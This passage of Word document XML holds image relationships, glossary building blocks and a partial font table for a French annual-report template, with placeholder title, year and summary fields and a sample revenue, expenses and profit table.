Target="media/image23.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><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image" Target="../media/image24.jpeg"/><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8272018F39E4CD9A03F40C2F29788F4"/>
        <w:style w:val=""/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:description w:val=""/>
        <w:guid w:val="{42826500-A28F-4867-A493-35F449B79261}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="35"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
            <w:t>Annual</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
            <w:br w:type="textWrapping"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
            <w:t>Report</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="7DA331C4651141A79F4D5AF832ABD05C"/>
        <w:style w:val=""/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:description w:val=""/>
        <w:guid w:val="{2EDC6C8E-F59B-4B78-B5A0-ADAD8BE1144C}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="886"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
            <w:t>[</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:i/>
              <w:iCs/>
              <w:color w:val="808080" w:themeColor="text1" w:themeTint="80"/>
              <w:sz w:val="28"/>
              <w:lang w:val="fr-FR"/>
              <w14:textFill>
                <w14:solidFill>
                  <w14:schemeClr w14:val="tx1">
                    <w14:lumMod w14:val="50000"/>
                    <w14:lumOff w14:val="50000"/>
                  </w14:schemeClr>
                </w14:solidFill>
              </w14:textFill>
            </w:rPr>
            <w:t>Vous pouvez ajouter un extrait ou une instruction ici. Un extrait est un résumé court du contenu du document.]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="Couverture de rapport"/>
        <w:style w:val="Normal"/>
        <w:category>
          <w:name w:val=" Rapport"/>
          <w:gallery w:val="coverPg"/>
        </w:category>
        <w:behaviors>
          <w:behavior w:val="pg"/>
        </w:behaviors>
        <w:description w:val="Grande photo avec bloc de titre et extrait du document"/>
        <w:guid w:val="{4FB38DFA-E20E-45AF-BF72-79A4BE7C0D35}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p>
          <w:pPr/>
          <w:r>
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <mc:AlternateContent>
                  <mc:Choice Requires="wp14">
                    <wp:positionV relativeFrom="page">
                      <wp14:pctPosVOffset>6800</wp14:pctPosVOffset>
                    </wp:positionV>
                  </mc:Choice>
                </mc:AlternateContent>
                <wp:extent cx="6400800" cy="5769610"/>
                <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                <wp:wrapNone/>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a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId3" cstate="print">
                          <a:extLst>
                            <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                              <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                            </a:ext>
                          </a:extLst>
                        </a:blip>
                        <a:srcRect l="276" t="14187" r="7305" b="2346"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6400800" cy="5769864"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="851"/>
          </w:pPr>
          <w:r>
            <w:tab/>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="851"/>
            <w:ind w:firstLine="720"/>
          </w:pPr>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="851"/>
          </w:pPr>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="890"/>
          </w:pPr>
          <w:r>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:posOffset>680085</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:posOffset>6628765</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="6400800" cy="2724150"/>
                    <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
                    <wp:wrapNone/>
                    <wp:docPr id="6" name="Zone de texte 6" descr="Title, Subtitle, and Abstract"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr txBox="1"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="6400800" cy="2724150"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln w="6350">
                              <a:noFill/>
                            </a:ln>
                            <a:effectLst/>
                          </wps:spPr>
                          <wps:txbx>
                            <w:txbxContent>
                              <w:p>
                                <w:pPr>
                                  <w:pStyle w:val="25"/>
                                  <w:rPr>
                                    <w:lang w:val="fr-FR"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:sdt>
                                  <w:sdtPr>
                                    <w:rPr>
                                      <w:lang w:val="fr-FR"/>
                                    </w:rPr>
                                    <w:alias w:val="Titre"/>
                                    <w:id w:val="1790474242"/>
                                    <w:placeholder>
                                      <w:docPart w:val="9255F4A68AA2433BAE48350F11FF7EF7"/>
                                    </w:placeholder>
                                    <w:showingPlcHdr/>
                                    <w:text w:multiLine="1"/>
                                  </w:sdtPr>
                                  <w:sdtEndPr>
                                    <w:rPr>
                                      <w:lang w:val="fr-FR"/>
                                    </w:rPr>
                                  </w:sdtEndPr>
                                  <w:sdtContent>
                                    <w:r>
                                      <w:rPr>
                                        <w:lang w:val="fr-FR"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">Rapport </w:t>
                                    </w:r>
                                    <w:r>
                                      <w:rPr>
                                        <w:lang w:val="fr-FR"/>
                                      </w:rPr>
                                      <w:br w:type="textWrapping"/>
                                    </w:r>
                                    <w:r>
                                      <w:rPr>
                                        <w:lang w:val="fr-FR"/>
                                      </w:rPr>
                                      <w:t>annuel</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p>
                                <w:pPr>
                                  <w:pStyle w:val="23"/>
                                  <w:rPr>
                                    <w:lang w:val="fr-FR"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:lang w:val="fr-FR"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">AF </w:t>
                                </w:r>
                                <w:sdt>
                                  <w:sdtPr>
                                    <w:rPr>
                                      <w:lang w:val="fr-FR"/>
                                    </w:rPr>
                                    <w:alias w:val="Date"/>
                                    <w:id w:val="1417830956"/>
                                    <w:placeholder>
                                      <w:docPart w:val="20C71B4DF16A42028537AD00A146F320"/>
                                    </w:placeholder>
                                    <w:showingPlcHdr/>
                                    <w:date>
                                      <w:dateFormat w:val="dd/MM/yyyy"/>
                                      <w:lid w:val="fr-FR"/>
                                      <w:storeMappedDataAs w:val="datetime"/>
                                      <w:calendar w:val="gregorian"/>
                                    </w:date>
                                  </w:sdtPr>
                                  <w:sdtEndPr>
                                    <w:rPr>
                                      <w:lang w:val="fr-FR"/>
                                    </w:rPr>
                                  </w:sdtEndPr>
                                  <w:sdtContent>
                                    <w:r>
                                      <w:rPr>
                                        <w:lang w:val="fr-FR"/>
                                      </w:rPr>
                                      <w:t>[Année]</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:sdt>
                                <w:sdtPr>
                                  <w:rPr>
                                    <w:lang w:val="fr-FR"/>
                                  </w:rPr>
                                  <w:alias w:val="Sommaire"/>
                                  <w:tag w:val="Sommaire"/>
                                  <w:id w:val="1594131030"/>
                                  <w:placeholder>
                                    <w:docPart w:val="69FA29A6085B4F3BA41AF5A2D91EF951"/>
                                  </w:placeholder>
                                  <w:showingPlcHdr/>
                                </w:sdtPr>
                                <w:sdtEndPr>
                                  <w:rPr>
                                    <w:lang w:val="fr-FR"/>
                                  </w:rPr>
                                </w:sdtEndPr>
                                <w:sdtContent>
                                  <w:p>
                                    <w:pPr>
                                      <w:ind w:left="450"/>
                                      <w:rPr>
                                        <w:lang w:val="fr-FR"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:i/>
                                        <w:iCs/>
                                        <w:color w:val="808080" w:themeColor="text1" w:themeTint="80"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs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wps:txbx>
                          <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
                            <a:noAutofit/>
                          </wps:bodyPr>
                        </wps:wsp>
                      </a:graphicData>
                    </a:graphic>
                    <wp14:sizeRelH relativeFrom="page">
                      <wp14:pctWidth>82500</wp14:pctWidth>
                    </wp14:sizeRelH>
                    <wp14:sizeRelV relativeFrom="page">
                      <wp14:pctHeight>27200</wp14:pctHeight>
                    </wp14:sizeRelV>
                  </wp:anchor>
                </w:drawing>
              </mc:Choice>
              <mc:Fallback>
                <w:pict>
                  <v:shape id="Zone de texte 6" o:spid="_x0000_s1026" o:spt="202" alt="Title, Subtitle, and Abstract" type="#_x0000_t202" style="position:absolute;left:0pt;margin-left:53.55pt;margin-top:521.95pt;height:214.5pt;width:504pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:251663360;v-text-anchor:bottom;mso-width-relative:page;mso-height-relative:page;mso-width-percent:825;mso-height-percent:272;" filled="f" stroked="f" coordsize="21600,21600" o:allowoverlap="f">
                    <v:fill on="f" focussize="0,0"/>
                    <v:stroke on="f" weight="0.5pt"/>
                    <v:imagedata o:title=""/>
                    <o:lock v:ext="edit" aspectratio="f"/>
                    <v:textbox inset="0mm,0mm,0mm,0mm">
                      <w:txbxContent>
                        <w:p>
                          <w:pPr>
                            <w:pStyle w:val="25"/>
                            <w:rPr>
                              <w:lang w:val="fr-FR"/>
                            </w:rPr>
                          </w:pPr>
                          <w:sdt>
                            <w:sdtPr>
                              <w:rPr>
                                <w:lang w:val="fr-FR"/>
                              </w:rPr>
                              <w:alias w:val="Titre"/>
                              <w:id w:val="1790474242"/>
                              <w:placeholder>
                                <w:docPart w:val="9255F4A68AA2433BAE48350F11FF7EF7"/>
                              </w:placeholder>
                              <w:showingPlcHdr/>
                              <w:text w:multiLine="1"/>
                            </w:sdtPr>
                            <w:sdtEndPr>
                              <w:rPr>
                                <w:lang w:val="fr-FR"/>
                              </w:rPr>
                            </w:sdtEndPr>
                            <w:sdtContent>
                              <w:r>
                                <w:rPr>
                                  <w:lang w:val="fr-FR"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Rapport </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:lang w:val="fr-FR"/>
                                </w:rPr>
                                <w:br w:type="textWrapping"/>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:lang w:val="fr-FR"/>
                                </w:rPr>
                                <w:t>annuel</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p>
                          <w:pPr>
                            <w:pStyle w:val="23"/>
                            <w:rPr>
                              <w:lang w:val="fr-FR"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:lang w:val="fr-FR"/>
                            </w:rPr>
                            <w:t xml:space="preserve">AF </w:t>
                          </w:r>
                          <w:sdt>
                            <w:sdtPr>
                              <w:rPr>
                                <w:lang w:val="fr-FR"/>
                              </w:rPr>
                              <w:alias w:val="Date"/>
                              <w:id w:val="1417830956"/>
                              <w:placeholder>
                                <w:docPart w:val="20C71B4DF16A42028537AD00A146F320"/>
                              </w:placeholder>
                              <w:showingPlcHdr/>
                              <w:date>
                                <w:dateFormat w:val="dd/MM/yyyy"/>
                                <w:lid w:val="fr-FR"/>
                                <w:storeMappedDataAs w:val="datetime"/>
                                <w:calendar w:val="gregorian"/>
                              </w:date>
                            </w:sdtPr>
                            <w:sdtEndPr>
                              <w:rPr>
                                <w:lang w:val="fr-FR"/>
                              </w:rPr>
                            </w:sdtEndPr>
                            <w:sdtContent>
                              <w:r>
                                <w:rPr>
                                  <w:lang w:val="fr-FR"/>
                                </w:rPr>
                                <w:t>[Année]</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:sdt>
                          <w:sdtPr>
                            <w:rPr>
                              <w:lang w:val="fr-FR"/>
                            </w:rPr>
                            <w:alias w:val="Sommaire"/>
                            <w:tag w:val="Sommaire"/>
                            <w:id w:val="1594131030"/>
                            <w:placeholder>
                              <w:docPart w:val="69FA29A6085B4F3BA41AF5A2D91EF951"/>
                            </w:placeholder>
                            <w:showingPlcHdr/>
                          </w:sdtPr>
                          <w:sdtEndPr>
                            <w:rPr>
                              <w:lang w:val="fr-FR"/>
                            </w:rPr>
                          </w:sdtEndPr>
                          <w:sdtContent>
                            <w:p>
                              <w:pPr>
                                <w:ind w:left="450"/>
                                <w:rPr>
                                  <w:lang w:val="fr-FR"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:i/>
                                  <w:iCs/>
                                  <w:color w:val="808080" w:themeColor="text1" w:themeTint="80"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs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v:textbox>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="Exemple de tableau"/>
        <w:style w:val="Titre de tableau"/>
        <w:category>
          <w:name w:val=" Rapport"/>
          <w:gallery w:val="tbls"/>
        </w:category>
        <w:behaviors>
          <w:behavior w:val="p"/>
        </w:behaviors>
        <w:description w:val="Tableau financier de base avec titre ombré"/>
        <w:guid w:val="{E75C1A92-CBA7-453C-B03E-7F4E64DC4D88}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="2134911414"/>
            <w:placeholder>
              <w:docPart w:val="92AB7121CE6042D8BB75CACA86C452BF"/>
            </w:placeholder>
            <w:temporary/>
            <w:showingPlcHdr/>
            <w15:appearance w15:val="hidden"/>
            <w:text/>
          </w:sdtPr>
          <w:sdtContent>
            <w:p>
              <w:pPr>
                <w:pStyle w:val="854"/>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                  <w:color w:val="FFFFFF"/>
                </w:rPr>
                <w:t>Titre de tableau</w:t>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="855"/>
            <w:tblW w:w="9216" w:type="dxa"/>
            <w:tblInd w:w="0" w:type="dxa"/>
            <w:tblBorders>
              <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
              <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
              <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
              <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
              <w:insideH w:val="single" w:color="D8D8D8" w:themeColor="background1" w:themeShade="D9" w:sz="4" w:space="0"/>
              <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
            </w:tblBorders>
            <w:tblLayout w:type="fixed"/>
            <w:tblCellMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tblCellMar>
          </w:tblPr>
          <w:tblGrid>
            <w:gridCol w:w="4239"/>
            <w:gridCol w:w="1659"/>
            <w:gridCol w:w="1659"/>
            <w:gridCol w:w="1659"/>
          </w:tblGrid>
          <w:tr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4239" w:type="dxa"/>
                <w:vAlign w:val="bottom"/>
              </w:tcPr>
              <w:p>
                <w:pPr>
                  <w:wordWrap/>
                  <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
                  <w:ind w:left="144" w:right="144"/>
                  <w:jc w:val="lef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caps/>
                    <w:smallCaps w:val="0"/>
                    <w:color w:val="7E97AD"/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="20"/>
                    <w:lang w:val="fr-FR"/>
                  </w:rPr>
                  <w:t>Description</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1659" w:type="dxa"/>
                <w:vAlign w:val="bottom"/>
              </w:tcPr>
              <w:p>
                <w:pPr>
                  <w:wordWrap/>
                  <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
                  <w:ind w:left="144" w:right="144"/>
                  <w:jc w:val="righ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val="0"/>
                    <w:caps/>
                    <w:smallCaps w:val="0"/>
                    <w:color w:val="7E97AD"/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="20"/>
                    <w:lang w:val="fr-FR"/>
                  </w:rPr>
                  <w:t>Chiffre d’affaires</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1659" w:type="dxa"/>
                <w:vAlign w:val="bottom"/>
              </w:tcPr>
              <w:p>
                <w:pPr>
                  <w:wordWrap/>
                  <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
                  <w:ind w:left="144" w:right="144"/>
                  <w:jc w:val="righ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val="0"/>
                    <w:caps/>
                    <w:smallCaps w:val="0"/>
                    <w:color w:val="7E97AD"/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="20"/>
                    <w:lang w:val="fr-FR"/>
                  </w:rPr>
                  <w:t>Dépenses</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1659" w:type="dxa"/>
                <w:vAlign w:val="bottom"/>
              </w:tcPr>
              <w:p>
                <w:pPr>
                  <w:wordWrap/>
                  <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
                  <w:ind w:left="144" w:right="144"/>
                  <w:jc w:val="righ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val="0"/>
                    <w:caps/>
                    <w:smallCaps w:val="0"/>
                    <w:color w:val="7E97AD"/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="20"/>
                    <w:lang w:val="fr-FR"/>
                  </w:rPr>
                  <w:t>Bénéfice</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4239" w:type="dxa"/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p>
                <w:pPr>
                  <w:wordWrap/>
                  <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
                  <w:ind w:left="144" w:right="144"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                    <w:b/>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r>
          <w:tr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4239" w:type="dxa"/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p>
                <w:pPr>
                  <w:wordWrap/>
                  <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
                  <w:ind w:left="144" w:right="144"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                    <w:b/>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r>
          <w:tr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4239" w:type="dxa"/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p>
                <w:pPr>
                  <w:wordWrap/>
                  <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
                  <w:ind w:left="144" w:right="144"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                    <w:b/>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r>
        </w:tbl>
        <w:p>
          <w:pPr/>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="9255F4A68AA2433BAE48350F11FF7EF7"/>
        <w:style w:val=""/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:description w:val=""/>
        <w:guid w:val="{90AD27BB-C646-42A4-B252-48E138FABFE3}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="887"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">Rapport </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
            <w:br w:type="textWrapping"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
            <w:t>annuel</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="20C71B4DF16A42028537AD00A146F320"/>
        <w:style w:val=""/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:description w:val=""/>
        <w:guid w:val="{C1CC57B6-CD5F-452B-A39F-F0164D5EB83E}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="888"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
            <w:t>[Année]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="69FA29A6085B4F3BA41AF5A2D91EF951"/>
        <w:style w:val=""/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:description w:val=""/>
        <w:guid w:val="{9F14D765-81CD-4413-A72C-1F18E7127746}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="889"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:i/>
              <w:iCs/>
              <w:color w:val="808080" w:themeColor="text1" w:themeTint="80"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="fr-FR"/>
              <w14:textFill>
                <w14:solidFill>
                  <w14:schemeClr w14:val="tx1">
                    <w14:lumMod w14:val="50000"/>
                    <w14:lumOff w14:val="50000"/>
                  </w14:schemeClr>
                </w14:solidFill>
              </w14:textFill>
            </w:rPr>
            <w:t>[Vous pouvez ajouter un extrait ou une instruction ici. Un extrait est un résumé court du contenu du document.]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="92AB7121CE6042D8BB75CACA86C452BF"/>
        <w:style w:val=""/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:description w:val=""/>
        <w:guid w:val="{5E40DAAD-1CE9-4641-85B5-1D72DCA68B53}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="891"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              <w:color w:val="FFFFFF"/>
            </w:rPr>
            <w:t>Titre de tableau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WenQuanYi Micro Hei"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Wingdings">
    <w:altName w:val="Abyssinica SIL"/>
    <w:panose1 w:val="05000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
